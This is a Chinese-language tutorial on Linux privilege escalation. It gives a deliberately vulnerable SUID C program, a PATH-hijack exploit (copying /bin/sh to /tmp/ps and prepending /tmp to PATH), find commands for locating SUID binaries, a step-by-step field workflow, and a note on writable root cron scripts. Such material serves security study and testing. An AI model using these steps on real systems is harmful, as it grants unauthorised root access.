linux环境变量覆盖提权&配置不当导致的提权

一、linux环境变量覆盖提权

背景：

root用户给第三方程序suid权限

攻击者可以通过反编译，查看源代码的方式，知道代码执行逻辑，尝试进行环境变量覆盖提权。

复现：

本次环境ubuntun14.04

当系统执行命令时，其实就是调用了环境变量里的文件

下面这两者执行结果是一样的

id         
/bin/id

1.c文件编译后的1当作suid的第三方程序

1. c内容：

#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("ps");
}

cd /tmp
gcc 1.c -o 1       #编译
chmod u+s 1        #给予1 suid权限
su test            #切换到test用户
test用户执行
cp /bin/sh /tmp/ps            
export PATH=/tmp:$PATH      #覆盖环境变量，不是永久性的
id                     

成功提权：

成功需要有两个条件：

(1)第三方程序是suid权限

(2)可以覆盖环境变量

find 查找suid权限的命令：

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

1执行系统的ps命令，把/bin/sh/复制到/tmp/ps下，就是执行/tmp/ps执行的是/bin/sh，当覆盖变量后，执行1就相当于执行sh，而1是suid权限，使用root权限运行的所以，相当于root去执行sh

实战中：

1. 通过find命令查找suid，去除系统命令，找第三方程序

2. 把第三方程序反编译或运行，查看运行结果看调用了什么系统命令

3. 尝试对命令执行的环境变量进行覆盖

二、配置不当导致的提权：

比如说linux的计划任务执行的文件权限设为755，777等权限，这些其他用户可以进行读写，会造成对里面的内容进行更改，最后造成提权。因为linux的计时任务时root用户运行的